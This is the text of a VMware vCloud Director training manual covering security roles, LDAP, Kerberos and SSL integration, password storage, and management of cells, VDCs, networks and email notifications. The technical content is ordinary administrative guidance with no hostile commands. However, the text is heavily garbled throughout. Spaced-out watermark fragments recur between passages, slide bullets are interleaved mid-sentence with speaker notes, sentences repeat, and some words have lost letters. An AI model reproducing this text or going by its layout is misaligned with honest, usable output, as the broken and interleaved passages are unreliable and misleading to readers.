Organization local

Organization importedfrom LDAP

VMware vSphere®identity provider

LDAP server

LDAP server

vCloud Director

organization

local

usersimported

users

imported

users

localusers

system

administrators

vSphere

users

VMware

vSphere

identity

provider




VMw ar e


i c S e c ur i t y

• Imported users from a Lightweight Directory Access Protocol (LDAP) server into vCloud

Director

• Locally defined users within each organization• Imported users from an LDAP server into a specific organization

• Imported users from the VMware vSphere® identity provider

All users defined at the system level are system administrators. System administrators have full

rights in all organizations in the cloud.

vCloud Director Security Roles and RightsSlide 6-8

vCloud Director uses roles and rights to determine what actions a user can perform in an

organization. vCloud Director includes a number of predefined roles with specific rights. System

administrators and organization administrators must assign each user or group a role. The same user

Rights determine which actions a user can perform.

Roles are a collection of rights.

Roles (other than system administrator) exist only at the organizationlevel.

Each user or group must be assigned to a role.

The same user can have different roles in different organizations.

Users can be assigned roles by belonging to a group.

Groups must be imported from external directory services, such asLDAP.

End users of cloud services do not require user ID or security rights invCloud Director.

End-user access should be controlled by application software in a vApp.




g g g p

can have a different role in different organizations. System administrators can also create roles and

modify existing ones.

V M

6

Predefined vCloud Director Security RolesSlide 6-9

The six predefined roles in vCloud Director are system administrator, organization administrator,

catalog author, vApp author, vApp user, and console access only.

All roles can be modified by system administrators except for the system administrator role System

vCloud Director includes predefined roles:

System Administrator

Organization Administrator

Catalog Author

vApp Author

vApp User

Console Access Only




Mw ar ev C l o u d Di r e c t or B a s

i c S e c ur i t y

All roles can be modified by system administrators except for the system administrator role. System

administrators can also create new custom roles.

Console Access Only RoleSlide 6-10

The Console Access Only role is an extremely limited role. It should be assigned only to end users

who have some kind of system administration responsibility on the virtual machines within a

specific VMware vSphere® vApp™. The Console Access Only role should not be assigned to

Extremely limited role:

Can view and use the console of a virtual machine in a vApp

Can manage virtual machine password settings from inside the guestoperating system (no access to vCloud Director guest customization of

virtual machines) Assign to end users who might be system administrators of the virtual

machines within a VMware vSphere® vApp but who have noadministration duties related to vCloud.

Excellent for the following:

Windows administrators

Linux root administrators Application administrators and developers, such as Web site administrators,

database administrators, and email administrators.




individuals who have cloud-related administration responsibilities.

The major difference between the Console Access Only role and the vApp user role is that console

access only users do not have the ability to do things at the vSphere level of the architecture. Theseinclude actions such as being able to modify the properties of a virtual machine or to copy a virtual

machine.

V M

6

vApp UsersSlide 6-11

The vApp user role is designed to allow someone to use a vApp. The vApp user role includes the

ability to change (nonresource) properties, to access the console, to share a vApp, to copy or move a

vApp, and to manage the passwords of virtual machines within the vApp. A vApp User can delete a

A b t t t

The vApp User role is useful for virtual machine system

administrators. vApp users can do the following:

Delete (but not create) a vApp

Edit vApp properties

Operate a vApp:

Start, stop, suspend, and reset

Access a virtual machine console

Share a vApp

Copy and move a vApp

Edit virtual machine properties:

Does not include resource items such as CPU, memory, network, or disk

Manage virtual machine password settings




Mw ar ev C l o u d Di r e c t or B a s i c S e c ur i t y

vApp but cannot create one.

The vApp user role is designed mainly for individuals who are system administrators of the virtual

machines that a vApp is made of. An end user or customer does not need the vApp user role to use avApp from a network connection.

Examples:

• If your vApp is a Web application designed to allow customers to place orders then those

customers are not going to need the vApp user role to place an order on the Web site.

• If your vApp is a Web application designed to allow help desk personnel to enter and update

trouble tickets those users are not going to need the vApp role to enter or manage tickets.If you have an individual who is the system administrator of a Web application (root user) they

might need the vApp user role to manage their systems in the vApp.

vApp AuthorsSlide 6-12

The vApp Author role is more limited than most other roles. It basically allows a user the ability to

create and manage vApps. The vApp Author role includes the ability to modify settings on virtual

machines within their vApps. This role can also create vApps from catalogs.

vApp authors can create and manage vApps.

They can modify the following on a virtual machine:

Memory

CPU

Disks

Passwords

They can create and modify vApp networks.

They can view and add vApps from organization catalogs.

The vApp Author role Includes all of the rights of the vApp User role.






Organization AdministratorsSlide 6-14

The organization administrator has broad powers within an existing organization. The organization

administrator role does not have the ability to add resources from the underlying vSphere

infrastructure to the cloud. But after organization VDCs and organization networks have been

created for an organization by the system administrator of VMware vCloud®, the organization

Organization administrators can do the following:

Add or manage organization users

Create or manage catalogs

Edit organization properties

Edit organization SMTP settings

Send email notifications

View and edit organization networks

Create new routed and isolated organization networks

Edit quota and lease policies

A vCloud Director system administrator has the Organization Administrator role by default in all organizations.




created for an organization by the system administrator of VMware vCloud®, the organization

administrator can manage them.

All system administrators of vCloud have the organization administrator role in all organizations. It

is not possible for an organization administrator to modify a system administrators rights within

their organization.

V Mw

6

Organization Administrators and NetworksSlide 6-15

The organization administrator role has a special relationship to organization virtual data center

(VDC) networks. In contrast to vCloud Director 1.5 organization administrators can now create

organization networks. However, these organization networks are limited to routed and isolated

networks. Only system administrators can create direct-connected organization networks.

Organization administrators do have the right to create organizationVDC networks.

Organization networks that can be created by organization administratorsare limited to routed and isolated organization networks.

Organization administrators do not have the ability to create direct-connected organization networks.

- In vCloud Director 1.5, organization administrators cannot create any kind oforganization network.

Organization administrators can change the properties on organization VDCnetworks.

Organization administrators cannot create edge gateways.

Organization administrators can modify some of the properties andconfiguration of an edge gateway.

Organization administrators cannot create or modify external networks.




w ar ev C l o u d Di r e c t or B a s i c S e c ur i t y

y y g

Another change between vCloud Director 1.5 and vCloud Director 5.1 is the edge gateway.

Organization administrators cannot create edge gateways. But they can modify some of their

properties and configuration.

System Administrator RoleSlide 6-16

The vCloud Director System Administrator role is the “root” or “Administrator” account for the

entire cloud. The only users who exist outside of the organizations are system administrators. All

system administrators within vCloud Director have full rights to all organizations. Individuals who

operate in the vCloud Director System Administrator role are often the same as VMware® vCenter

All users defined at the vCloud Director system level are systemadministrators.

Other roles can only be assigned to users at the organization level.

If a user is going to be assigned a role other than system administrator, the

user ID should not be created at the system level. You can create individual users or import groups of users at the system

level.

System Administrator is the only type of user account with cloud-widerights in vCloud Director.

System administrators create and manage everything in the cloud

Only system administrators can create and modify roles.




Server™ administrators.

All users who are defined at the vCloud Director system level are system administrators. These

include users created in vCloud Director and users imported from external LDAP systems into

vCloud Director. If a user must have less than System Administrator rights, the user should be

created at an Organization level. It is possible to have the same user imported into different

organizations from one LDAP system. That user can then be assigned different rights in each

organization if desired.

Users do not have to be imported from LDAP or created at organization level. You can create users

or import users from LDAP at the system level. It is also possible to import groups of users fromexternal LDAP servers at the system level.

V Mw

6

Custom RolesSlide 6-17

System administrators can create custom roles by either creating a role from the beginning or by

copying and modifying an existing role. System administrators also can delete roles. The best

practice is not to delete or modify the standard roles. Instead, either create a role from the beginning

or copy an existing role and modify it.

System administrators can create new roles as follows:

Create a role from the beginning by manually selecting the desired rights

Copy a role to a new role and modify the rights

System administrators can also modify a role.

Some rights that can be assigned to custom roles might have limitedfunctionality.

Best practices:

Do not modify or delete roles.

Copy a role to a new role.

Modify the rights as desired. Assign the new role to users.




w ar ev

C l o u d Di r e c t or B a s i c S e c ur i t y

Switching Between RolesSlide 6-18

If an individual must switch between two different roles in vCloud Director, that individual must

carefully manage the browser tabs that give them access to the vCloud Director console. Use the

procedure outlined here to switch between vCloud Director security roles.

A single individual might have access to multiple user IDs with differentroles.

Example: A system administrator who needs to test an organizationadministrator account

Web browsers have the ability to use tabs to open multiple sessions inthe same browser.

To switch between user IDs with different roles, users should use thefollowing procedure:

Click Log Out in the upper-right corner of the browser window.

Close the tab.

Open a new tab with the correct URL to the desired vCloud Directorconsole.

Log in under the new user ID that has a different security role in the newtab.




V Mw a

6

Lab 10: Managing Custom Security RolesSlide 6-19

Manage a custom VMware Cloud Director security role




ar ev

C l o u d Di r e c t or B a s i

c S e c ur i t y



Create and manage security roles in vCloud Director




V Mw a

6

Lesson 2: LDAP IntegrationSlide 6-21

Lesson 2:

LDAP Integration




ar ev




objectives:

Create custom vCloud Directory security roles

Integrate LDAP servers with vCloud Director




V Mw ar

6

LDAP IntegrationSlide 6-23

You can use an LDAP service to provide a directory of users and groups to import into an

organization. If you do not specify an LDAP service, you must create a user account for each user in

the organization. LDAP options can only be set by a system administrator and cannot be modified

by an organization administrator.

M lti l th d f th ti ti t d d di hi h t f LDAP

vCloud Director supports two types of LDAP integration:

Active Directory (Windows)

OpenLDAP (Linux)

Authentication methods:

Simple with optional SSL

Kerberos with optional SSL

Only the system administrator can configure LDAP settings.

Each organization can have a separate LDAP configuration.

Users and groups must be manually imported into vCloud Director.

If you are using VMware® vCenter Single Sign-On, you canidentify your LDAP server as an identity provider.

Users are treated like users imported from LDAP.




r ev


Multiple methods of authentication are supported, depending on which type of LDAP server you

have connected to.

Each organization can have its own LDAP configuration. Users and groups must be imported into

the organization and assigned roles before they can be used. It is possible to modify how often

vCloud Director will connect to the LDAP server to synchronize accounts.

vCloud Director 5.1 has the capability to import users from VMware® vCenter™ Single Sign-

On™. These users are treated in a manner similar to users imported from LDAP sources. Users can

be imported from any system configured in vCenter Single Sign-On as an identity provider.

The use of vCenter Single Sign-On and other vCloud Director security integration features such as

Security Assertion Markup Language (SAML) are covered in more detail in the advanced vCloud

Director courses.

LDAP Integration BenefitsSlide 6-24

vCloud Director provides for single sign-on capability. A single sign-on capability enables a user to

have a single user ID and password that works throughout the system. vCloud Director provides

single sign-on by integrating LDAP. vCloud Director imports user IDs from external LDAP

systems. vCloud Director can also import other key information such as email addresses, group

membership, and contact information.

LDAP systems can define and manage a large amount of userproperties external to vCloud Director:

User ID and password

Email address

Group membership Contact information

An external LDAP system enables a single location to be sharedbetween other systems and vCloud Director to manage user security(single sign-on).

vCloud Director checks users who were imported from LDAP at login to

ensure that credentials are correct.




vCloud Director does not import user passwords from external LDAP systems. Instead vCloud

Director confirms that a password is correct when a user logs in by checking the supplied password

hash against the password hash currently stored in the LDAP directory.

In this discussion, the term “single sign-on” should be considered a generic security term.

V Mw ar e

6

LDAP SynchronizationSlide 6-25

vCloud Director does not automatically import users and groups from LDAP systems. Instead you

must manually select which users and groups to import. vCloud Director checks the users

credentials for all imported users at login time. It is not possible for a user in an external LDAP

directory to log in to vCloud Director unless their user ID has been imported by vCloud Director.

vCloud Director does not support hierarchial domains in LDAP

LDAP users cannot log in to vCloud Director until their user ID hasbeen imported.

The vCloud Director user account is not created until first login.

vCloud Director does not support recursive OU import.

Users and groups are pulled from the target OU only

vCloud Director cannot modify the information in an LDAP directory.

You must configure the frequency of synchronization of vCloud Directoruser and group information with LDAP.




ev


vCloud Director does not support hierarchial domains in LDAP.

vCloud Director cannot modify the information in an LDAP directory.

vCloud Director will synchronize imported user data such as group membership, e-mail address and

contact information. The period of synchronization must be configured by either the system

administrator (for vCloud Director system-wide user accounts) or the organization administrator (for

custom LDAP configurations at the organization level).

LDAP NetworkSlide 6-26

vCloud Director can use LDAP at both the system level and the organization level. At the system

level you can either connect to an external LDAP system or you can create and use users who are

internal to vCloud Director. Even if you use an external LDAP system, VMware® recommends that

you create at least one system user that is internal-only. The existence of at least one internally

defined system administrator allows you to log in to your vCloud Director console even if the LDAP

i ffli

Each organization can query an organization-specific LDAP server

Organizations can share a custom LDAP server

A single LDAP server can serve the entire cloud.

Organizations require individual LDAP OU definitions.

vCenter

Server

systemvCloud

Director

database

server

vShield

ManagervCloud

LDAP

server

organization

Alpha

LDAP server

organization

Beta

LDAP server




system is offline.



Kerberos IntegrationSlide 6-28

If you are using Kerberos authentication, you must add a Kerberos realm to the vCloud Director

server first. To use an LDAP server, the vCloud Director server must be able to connect to it over

the network. This connection requires a proper DNS configuration. Some LDAP systems use a Key

Distribution Center that is a separate server from the LDAP server. If you are using Kerberos

authentication, the vCloud Director server must be able to connect to the KDC if it is separate from

the LDAP server

vCloud Director can use Kerberos or Kerberos plus SSL to authenticate to Active Directory LDAP servers.

You must add a Kerberos realm to use Kerberos authentication:

Realm names are all uppercase unless Allow lower-case realms has been

selected in the LDAP configuration panel. For Active Directory, the realm is the domain name in uppercase. Example:

ENGINEERING.ACME.COM

The KDC is the domain controller. Example:

DC1.ENGINEERING.ACME.COM

Connecting to LDAP and adding Kerberos realms requires DNS name

resolution to the Key Distribution Center (KDC). The vCloud Director server must be able to access the LDAP servers and

the KDCs.

To use Kerberos, you must use only the fully qualified domain name whenyou configure the host name or IP of the LDAP server in vCloud Director.




the LDAP server.

It is possible to serve the entire vCloud with a single LDAP server. Or individual organizations canhave their own LDAP servers.

vCloud Director can use either Kerberos or Kerberos + SSL to authenticate to LDAP servers if the

LDAP server is either a Windows 2003 or a Windows 7 domain controller.

Kerberos is not supported when vCloud Director authenticates to Linux OpenLDAP servers.

However to increase security it is possible to use SSL when authenticating to Linux OpenLDAP

servers.

Before vCloud Director can use Kerberos, you must configure the Kerberos realm in vCloud

Director.

V Mw ar e

6

Windows Active Directory is an LDAP directory that also uses a modified implementation of

Kerberos. If you are trying to connect to a Windows LDAP then the realm name is the same thing asthe Windows domain name in upper case.

To use Kerberos to log in to a Windows LDAP the Key Distribution Center (KDC) is the domain

controller. You can use any domain controller in the domain as the KDC.

Kerberos is one of the most secure and reliable systems ever created for secure authentication. But it

can have problems. Most problems with Kerberos authentication can be traced to one of two issues:

• DNS issues. If there are minor differences in DNS in the way a node name is stored it can prevent Kerberos authentication. These differences might not cause problems for other types of

network connections. Kerberos requires the DNS name to be exactly what you are trying to

authenticate to in Kerberos. The same name must be used in the Kerberos tickets. The best

practice is to use the FQDN in all places.

• Lack of time synchronization. Kerberos tickets are time stamped to prevent an intruder from

stealing and reusing tickets. The standard limit for time drift is 5 minutes. If is more than a 5-

minute difference occurs from the time of the client trying to connect (in this case, the vCloudDirector server) to the Kerberos KDC, the ticket is considered invalid. Prevent time

synchronization problems by synchronizing the vCloud Director server and the Kerberos KDC

to the same time source. Using NTP servers on all systems solves this problem.




v

C l o u d Di r e c t or B a s i c

S e c ur i t y



V Mw ar ev

6

SSL IntegrationSlide 6-30

To use SSL, you must select it. You must then determine if you will automatically accept all

certificates or if you will insist on browsing to a specific certificate. Using all certificates is much

easier to configure. If your LDAP server has a certificate, it is accepted automatically. The use of

SSL also provides an encrypted password exchange with the LDAP server.

If you require a specific SSL certificate, the certificate will increase security. But the certificate from

the LDAP ser er m st be located on o r s stem (the one the Clo d Director bro ser console is

Select Use SSL to useLDAP over SSL (LDAPS).

For LDAPS, the default TCPport is 636, not 389.

You can either accept allcertificates or browse to aspecific certificate.

To use a specific SSLcertificate, you must alsohave access to the SSLkeystore and you mustconfigure the keystorepassword.




v C l o u d Di r e c t or B a s i c

S e c ur i t y

the LDAP server must be located on your system (the one the vCloud Director browser console is

running from) and you must know the location to your SSL Key Store file and have the password.

LDAP Terminology and SyntaxSlide 6-31

LDAP directories use unique terminology and syntax. This slide shows some of the common

examples.

These LDAP schema attributes can be used to uniquely identify two different users with the same

name in different parts of the directory. The Distinguished Name (DN) and Relative Distinguished

Name (RDN) are both frequently used in LDAP system. You will have to use the DN for LDAP

queries in vCloud Director You will also have to supply Domain Components (DC) as part of the

DN = distinguished name

RDN = relative distinguished name

Think of the DN as the full file path and the RDN as a relative filename in itsparent folder.

CN = common name

OU = organizational unit

DC = domain component

Sample syntax for two employees named Jane Smith who work for thesame company and are in the same LDAP directory:

Jane Smith, in Sales, at the Newtech branch of Acme Company:

- dn: cn=Jane Smith, ou=Sales, dc=Newtech, dc=acme, dc = com

Jane Smith, in Engineering, at the Oldtech branch of Acme Company:

- dn: cn=Jane Smith, ou=Engineering, dc=Oldtech, dc=acme, dc = com




queries in vCloud Director. You will also have to supply Domain Components (DC) as part of the

connection string.

V Mw ar ev

6

LDAP Namespace Diagram: ExampleSlide 6-32

Here is a graphical representation of two individuals with the same name in different locations

within an LDAP directory.

dc=acme, dc=com

dc=oldtechdc=newtech

ou=sales ou=engineering

cn=Jane Smithcn=Jane Smith




Cl o u d Di r e c t or B a s i c

S e c ur i t y

Common LDAP AttributesSlide 6-33

The schema used by different LDAP systems might vary. Check with your LDAP administrator to

confirm that you are using the correct schema for your vCloud Director configuration. If your

schema is configured incorrectly then you will not be able to execute searches on the LDAP

directory.

This slide shows two different possible configurations that are used in OpenLDAP. Both of these

have minor differences with Active Directory.

Check with your LDAP administrator to confirm that you are using

the correct schema. Different LDAP systems use different attributes.




ave o d e e ces w t ct ve ecto y.

V Mw ar ev C

6

Querying LDAP AttributesSlide 6-34

Even if the LDAP attributes in vCloud Director are configured correctly, you might have errors

returned on a search. Errors can occur if data is not present in the LDAP directory. An example

would be a user who does not have an email address or telephone number listed in the directory.

Missing data might simply indicate that the LDAP database did not

have values in all of the fields that you queried. Mismatches on

attributes might cause searches to fail.





S e c ur i t y

LDAP at the Organization LevelSlide 6-35

At the organization level, vCloud Director presents three options:

1. Do not use LDAP. All of the users in this organization will be internally defined within the

vCloud Director system.

2. Use the vCloud Director system LDAP service. The organization uses the LDAP service that

has been configured at the system level. To leverage the system-defined LDAP, all organization

You can specify a custom LDAP at the organization level, which allows eachorganization to have a different (private) LDAP system.

If you bind all of your organizations to the same LDAP server (for example, in aprivate cloud), VMware® recommends that each organization have a uniqueOU.

Only vCloud Director system administrators can configure LDAP fororganizations.

After LDAP is configured, organization administrators can import LDAP usersand groups.




users must be defined in the same Organization Unit (OU) in the LDAP database. You mustconfigure that OU here. VMware recommends that different organizations have unique OUs

within LDAP. The use of unique OUs preserves multitenancy. Using one system-wide LDAP

service with unique OUs for each organization is a VMware best practice for a private cloud

configuration.

3. Use a custom LDAP server. A custom LDAP server enables an organization to use its own

LDAP service. VMware recommends the use of custom LDAP servers in public cloud

implementations.

V Mw ar ev C

6

Password ProtectionSlide 6-36

LDAP users will never have their passwords stored in the vCloud Director database. Any users that

are defined internally to vCloud Director will have their passwords stored in the vCloud Director

database in an encrypted and salted form.

vCloud Director also stores some passwords. These include passwords for accessing certificates,

databases, VMware® vCenter™ servers, and VMware® vShield Manager™ servers. All of these

passwords are stored in encrypted form in the file $VCLOUD_HOME/etc/global.properties on

LDAP user passwords are never stored in the vCloud Directordatabase.

Local user passwords are salted and hashed before storage in thevCloud Director database.

vCloud Director also maintains other passwords for accessingcertificates, databases, VMware® vCenter Server systems, andVMware® vShield Manager servers:

These passwords are encrypted using a unique key per vCloud Directorinstallation.

These passwords are stored in$VCLOUD_HOME/etc/global.properties.





S e c ur i t y

the vCloud Director server. Carefully protect any backups that contain that file.



V Mw ar ev C

6

vCloud End-User Single Sign-OnSlide 6-38

vCloud Director user IDs and passwords are for users who have administrative responsibilities

within the vCloud Director system. Cloud administrative users include catalog authors, vApp

authors, and organization administrators. LDAP and vCloud Director user accounts are not required

for end users.

You can configure a single sign-on service for end users with VMware® Horizon Application

Manager™. VMware® Horizon Application Manager™ enables you to integrate end-user cloud

VMware® Horizon Application Manager:

Secures end-user access to software as a service (SaaS) and Webapplications across different devices

Provisions and entitles secure access

Tracks SaaS license activity

Generates usage reports

Used with applications such as the following:

Google Apps

Salesforce.com

WebEx AmericanAirlines

Facebook

ADP

Mozy




l o u d Di r e c t or B a s i c

S e c ur i t y

security with numerous third-party applications.

Security Best PracticesSlide 6-39

For best practices on hardening your vCloud implementation, see

these documents:

VMware Security Advisories, Certifications & Guides

https://www.vmware.com/support/support-resources/hardening-guides.html

VMware vCloud Architecture Toolkit (vCAT 3.1) http://www.vmware.com/cloud-computing/cloud-architecture/vcat-

toolkit3.html

All documents can be found at http://www.vmware.com




V Mw ar ev C

l o

6

Lab 11: Integrating LDAP and Active DirectorySlide 6-40

Integrate LDAP into a VMware vCloud




o u d Di r e c t or B a s i c

S e c ur i t y



Create custom vCloud Directory security roles

Integrate LDAP servers with vCloud Director




V Mw ar ev C

l o u

6


vCloud Director has several predefined security roles.

System administrators can create custom security roles.

LDAP systems can be integrated into vCloud at both the system andorganization level.

Questions?




ou d Di r e c t or B a s i c

S e c ur i t y



M an a gi n gV M

w ar ev C l o u d Di r e c t

or R e s o ur c e s

7

M O D U L E 7

Managing VMware vCloud DirectorResources 7Slide 7-1

Module 7





Course Introduction






Managing VMware vCloud Director Resources








M an a gi n gV M

w ar ev C l o u d Di r e c t or R e s o ur c e s

7 Importance

Slide 7-3

Effective management of VMware® vCloud Director® resources

(providers and networks) ensures that customers always have the

resources they need while using corporate IT assets.

Effective management of vCloud Director resources also ensures the

highest efficiency and cost-effectiveness in their use.



Module 7 Managing VMware vCloud Director Resources 277



M an a gi n gV M


7 Lesson 1: Managing Cloud Resources as a System

Administrator Slide 7-5

Lesson 1:

Managing Cloud Resources as a System

Administrator




Learner Objectives

Slide 7-6


objectives:

Use the cell management tool to perform basic cell maintenance tasks

Manage provider and organization virtual data centers

Manage external networks and edge gateways

Prepare and unprepare VMware® ESXi hosts

Configure and send email notifications








M an a gi n gV M


7 Cloud Cell Maintenance Message

Slide 7-8

If you want to stop a cell and let users know that you are performing maintenance, you can turn on

the maintenance message.

When the maintenance message is turned on, users who attempt to log in to the cell from a browser

see a message stating that the cell is down for maintenance. Users who attempt to reach the cell

using the VMware vCloud® API receive a similar message.

Turn on the cloud cell maintenance message during maintenance:

Displayed whenever users try to access the vCloud Director interface

To enable the maintenance message, use these commands:# service vmware-vcd stop

# /opt/vmware/vcloud-director/bin/vmware-vcd-cell maintenance

To disable the maintenance message, use these commands:# /opt/vmware/vcloud-director/bin/vmware-vcd-cell stop

# service vmware-vcd start




Cell Management Tool (1)

Slide 7-9

The cell management tool is located in /opt/vmware/vcloud-

director/bin.

To list available commands, at the command prompt, type cell- management-tool –h.

Commands: cell

- Suspends the task scheduler

- Checks the status of active tasks

- Shuts down the cell gracefully

dbextract

- Exports data from the vCloud Director database certificates

- Replaces the cells SSL certificates




M an a gi n gV M

w ar ev C l o u d Di r e c t o

r R e s o ur c e s

7 Cell Management Tool (2)

Slide 7-10

Commands:

generate-certs

- Generates new self-signed SSL certificates for the cell

recover-password

- Recovers the vCloud Director system administrator password- Requires the knowledge of the vCloud Director database user name and

password




Provider Virtual Data Center Management

Slide 7-11

After you create a provider virtual data center (VDC), you can modify its properties, disable or

delete it, and manage its VMware® ESXi™ hosts and datastores.

Disabling a provider VDC prevents the creation of organization VDCs that use the provider VDC

resources. When a provider VDC is disabled, vCloud Director also disables the organization VDCs

that use its resources. If VMware vSphere® vApps™ are running and you have powered-on virtual

machines, these virtual machines continue to run, but you cannot create or start additional vApps or

virtual machines on this disabled provider VDC.When you delete a provider VDC, it removes its compute, memory, and storage resources from

Enable and disable a provider virtual data center (VDC)

When disabled:

- New organizations cannot be created.

- vApps cannot be created, deployed from the catalog, nor started.

- Already-running VMware vSphere® vApps and powered-on virtual

machines continue to run.

Delete a provider VDC

Delete a provider VDC to release its compute, memory, and storageresources from vCloud Director.

Dependencies must be deleted first

Upgrade the hardware version supported by a provider VDC

The selected hardware version must be supported by the underlyingVMware vSphere® infrastructure.

Downgrading the hardware version is not supported.

Merge with another provider VDC

Combine two provider VDCs into a single managed provider.




vCloud Director, although the resources remain unaffected in VMware vSphere®. As with each

hierarchy-dependent construct in vCloud Director, the construct, or object, cannot be deleted until

the administrator manually resolves dependencies. To delete a provider VDC, you must first resolve

the dependencies by disabling and deleting the dependent objects.

You can upgrade the hardware version based on the capabilities of the ESXi hosts in use.

Downgrading the highest supported hardware version is not supported.



Managing External Networks

Slide 7-12

You can enable and disable external networks in the network properties page, under the Network

Specification tab. When you disable an external network you are disabling the pool resources

available for the network, including any static IP pool ranges. Because the static IP pool is disabled,

you cannot create edge gateways nor run vApps or virtual machines that require static IP pool

allocation from the external network.

When an external network is disabled, the network continues to pass traffic. Already-deployed edge

gateways and running direct-connect organization VDC networks continue to operate and continueto have whatever connectivity that has been configured.

Y h t i t f th t k ifi ti f t l t k b t t

Enable and disable an external network

When disabled:

- Existing edge gateways and direct-connect organization VDC networks are

unaffected.

- Network traffic is not blocked. Instead, additional allocation of resources is

disabled, such as the static IP pool.

Change DNS parameters used by an external network

Add, remove, and modify static IP pool ranges used by an externalnetwork

Added ranges must be relevant to the subnet specification.

You cannot remove a range that contains already-allocated addresses.

You cannot modify a range that contains already-allocated addressesunless the resulting range includes the registered allocations.

Delete an external network





You can change certain aspects of the network specification of an external network, but you cannot

change the Gateway IP address or the subnet mask. You can change the DNS parameters and the

DNS relay setting. You can manage the static IP pool by adding, removing, and modifying IP

address ranges.

When managing the static IP pool for an external network it is important to remember to check the

current IP allocations table. You cannot delete a static IP range that contains an already-allocated IP

address. Likewise, you cannot modify an existing IP range in a manner that would exclude an

already-allocated IP address.

M an a gi n gV M


r R e s o ur c e s

7 If you need to change the subnet characteristics of an external network, create a new external

network with those characteristics.

You can delete an external network once all dependencies on that network have been removed.

Dependencies include edge gateways and other direct-connect organization VDC networks. Resolve

dependencies by shutting down, disabling, and deleting the dependent objects or by changing the

dependent relationship.




Managing Network Pools

Slide 7-13

After you create a network pool, you can modify its name and description or delete it. Depending on

the type of network pool, you can also add port groups, Cloud isolated networks, and VLAN IDs.

You can add Cloud isolated networks to a vCloud Director network isolation-backed network pool.

Verify that you have a network pool that is backed by a port group and verify that you have an

available port group in vSphere.

You can add Cloud isolated networks to a vCloud Director network isolation-backed network pool

(a vCloud Director network isolation-backed network pool).

You can delete a network pool to remove it from vCloud Director provided that it satisfies the

Delete a network pool


Depending on the type of network pool, you can do the following:

Add and remove port groups.

Add and remove isolation-backed networks. Add, remove, and change VLAN ID ranges.




following prerequisites:

• No organization VDC is associated with the network pool.

• No vApps use the network pool.

• No NAT-routed or internal organization VDC networks use the network pool.

M an a gi n gV M


r R e s o ur c e s

7 Organization Virtual Data Center Management: System

AdministratorSlide 7-14

As a system administrator, you have complete configuration control over each organization VDC

with few limitations. The system administrator cannot change the fundamental allocation model of

an organization VDC. The system administrator can, at any time, change the characteristics and

settings associated with the selected allocation model, including reservations, guarantees, policy

limits, and maximum leases. These settings affect only vApps that you start from this point on.

Existing vApps must be stopped and then restarted for new policy and allocation model changes totake effect.

The system administrator is the only role that can create organization VDC networks that directly

Only a system administrator can:

Change the allocation model properties of an organization VDC

- Reservations and guarantees, policy quotas

- The allocation model type cannot be changed Configure thin and fast provisioning options of an organization VDC

Change the network pool type and size used by an organization VDC

Disable an organization VDC

- When disabled:

- New vApps cannot be created or deployed from the catalog

- Existing vApps continue to run unaffected Delete an organization VDC

- Dependencies must be deleted first




The system administrator is the only role that can create organization VDC networks that directly

connect to an external network entity and manage external network suballocation IP pools.

Organization administrators must rely on a system administrator for these tasks.

Additionally, a system administrator controls:

• Network pool properties used by the organization VDC

• The network pool used by the organization VDC can be changed to some other pool and

the number of networks updated.

• Storage policies used by the organization VDC

• Thin-provisioning and fast-provisioning options can be changed at any time.

You cannot change the allocation model of an organization VDC. However, you can create

additional organization VDCs backed by the same, or some other, provider. Each organization VDC

can have a different allocation model. For example, this ability might be useful for migrating an

organization from a reservation pool to a pay-as-you-go model.

When you disable an organization VDC, you prevent the use of its compute and storage resources

by other vApps and virtual machines. vApps that are running and powered-on virtual machines

continue to run but you cannot create or start additional vApps or virtual machines.

When you delete an organization VDC, it removes its compute, memory, and storage resources from

the organization. The resources remain unaffected in the source provider VDC. Dependencies must

be resolved before an organization VDC can be deleted.




M an a gi n gV M


r R e s o ur c e s

7 Email Notifications

Slide 7-15

vCloud Director requires a Simple Mail Transport Protocol (SMTP) server to send user notification

and system alert emails. You can modify the settings that you specified when you created the

organization.

You can send an email notification to all users in the entire installation, all system administrators, or

all organization administrators. You can send an email notification to notify users about upcoming

system maintenance, for example.

vCloud Director sends system alert emails when it has important information to report. For example,vCloud Director sends an alert when a datastore is running out of space. You can configure vCloud

Director to send email alerts to all system administrators or to a specified list of email addresses. For

SMTP server settings can be defined at the system level.

Organizations may inherit or override the system-level SMTP settings.

Email notifications are contextual to the target object or functionalcategory.

When a data container is selected for an email notification, such as aprovider VDC or organization VDC, the email notification is automaticallyaddressed to all users with items inthat container.

When a user container isselected, such as an organization,the email notification can beaddressed to any relevant user

group.




example, you can send an email notification to notify users about upcoming system maintenance.

For both the SMTP settings and the Email notification settings, an organization administrator may

choose to keep the system administrator-defined settings, or define new settings. At a minimum an

organization administrator may want to change Email notification settings so that all emails are

branded appropriately. An organization administrator can also override SMTP settings if an SMTPserver is available for organization use.

Lab 12: Managing Cloud Resources

Slide 7-16

Manage cloud resources as a system administrator




M an a gi n gV Mw ar ev C l o u d Di r e c t o

r R e s o ur c e s

7 Review of Learner Objectives

Slide 7-17


Use the cell management tool to perform basic cell maintenance tasks

Manage provider and organization virtual data centers

Manage external networks and edge gateways

Prepare and unprepare VMware® ESXi hosts

Configure and send email notifications




Lesson 2: Managing Organization Resources

Slide 7-18

Lesson 2:Managing Organization Resources





r R e s o ur c e s

7 Learner Objectives

Slide 7-19


objectives:

Manage organization policies

Manage organization edge gateways and networks

Manage vApps Configure organization email notifications




Managing Organization Policies

Slide 7-20

An organization administrator has full control over the organization policy except for the policy

limits imposed by a system administrator. Limits relating to resource intensive operations and

network consumption per-virtual machine are locked. An organization administrator can reconfigure

lease and quota settings, and configure account lockout parameters.

System and organization administrators can update the organizationpolicy.

Leases:

- Maximum running and storage durations, cleanup option

Default quotas for users:

- Maximum virtual machines per user, running machines per user

Account lockout:

- Number of invalid logins allowed, lockout duration

Only a system administrator can change policy limits.

Number of resource-intensive operations and simultaneous connections pervirtual machine





r R e s o ur c e s

7 Managing Organization Virtual Data Center Edge Gateways

Slide 7-21

Organization administrators can redeploy edge gateways and reapply edge gateway service

configurations. Organization administrators also have full control over rate limits set on each edge

gateway for inbound and outbound network throughput.

An Organization administrator cannot configure external networks attached to an edge gateway, or

manage suballocated IP pools.

System and organization administrators can:

Redeploy an edge gateway

Deploy a new instance of the edge gateway with the same serviceconfiguration.

Reapply an edge gateway service configuration

Enable or disable an edge gateway

Configure traffic limits imposed by an edge gateway

Inbound and outbound limits for each external network that the edgegateway connects to.

Synchronize syslog server settings to an edge gateway




Managing Organization Virtual Data Center Networks

Slide 7-22

Organization administrators can create routed and isolated organization VDC networks. This is a

new feature as of vCloud Director version 5.1. An organization administrator has full control over

each organization VDC network that does not directly connect to an external network. For each

